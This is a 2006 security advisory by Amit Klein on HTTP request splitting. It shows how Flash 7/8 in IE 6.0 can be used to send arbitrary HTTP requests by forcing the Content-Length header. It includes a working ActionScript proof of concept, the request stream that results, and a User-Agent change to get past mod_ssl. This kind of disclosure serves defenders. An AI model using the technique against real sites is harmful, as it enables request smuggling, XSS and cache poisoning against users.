Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)

             Amit Klein, August 2006


The trick
=========

In [1], I showed how to forge parts of HTTP requests containing 
CRs and LFs using Flash. In that write-up, the data was part of the
HTTP body section. However, combining the Content-Length overriding
trick from [2] enables a condition of HTTP request splitting (see [3]).

This enables almost complete control over the second HTTP request - 
including methods. The only pre-requisite (apart from using IE 6.0 and
Flash 7/8) is that there's one resource in the target website that does
not terminate the TCP connection in response to a POST request.

Here's an example:

  var req:XML=new XML("<foo>\r\nOPTIONS / HTTP/1.0\r\nHost: 
www.target.site\r\n\r\n</foo>");
  req.addRequestHeader("Content-Length","7");
  req.send("http://www.target.site/path/to/script.cgi","_blank");

The request stream is:

  POST /path/to/script.cgi HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 7
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  Host: www.target.site
  Connection: Keep-Alive
  Cache-Control: no-cache

  <foo>
  OPTIONS / HTTP/1.0
  Host: www.target.site
  
  </foo>

Note that this works well in HTTP and HTTPS. 

Also note that if the target web server is Apache 2.0 with mod_ssl,
then there's a need to modify the User-Agent header for IE, in order
for it not to include the string "MSIE". If the string "MSIE" is
found in the User-Agent header, mod_ssl will terminate the HTTPS
connection after the first request (see [5]). So this is as simple
as adding the following to the ActionScript code:

  req.addRequestHeader("User-Agent","Hacker/1.0");


Some interesting consequences
=============================

- Javascript scanning - now can use almost all HTTP methods (verbs) 
  including WebDAV, full control over the headers, etc.

- All the impact in [3] and [4] is relevant - XSS in some cases, HTTP
  request smugling and HTTP Response Splitting attacks (from the 
  browser), etc.


References
==========

[1] "Sending multipart/form-data requests from Flash (with arbitrary 
    headers)", Amit Klein, August 2006
    http://www.securityfocus.com/archive/1/442820

[2] "Forging HTTP request headers with Flash", Amit Klein, July 2006
    http://www.securityfocus.com/archive/1/441014

[3] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, 
    and a lot more...", Amit Klein, September 2005
    http://www.securityfocus.com/archive/1/411585

[4] "IE + some popular forward proxy servers = XSS, defacement (browser
    cache poisoning)", Amit Klein, May 2006
    http://www.securityfocus.com/archive/1/434931

[5] "mod_ssl F.A.Q." (mod_ssl website), under "When I connect via HTTPS
    to an Apache+mod_ssl+OpenSSL server with Microsoft Internet Explorer
    (MSIE) I get various I/O errors. What is the reason?"
    http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49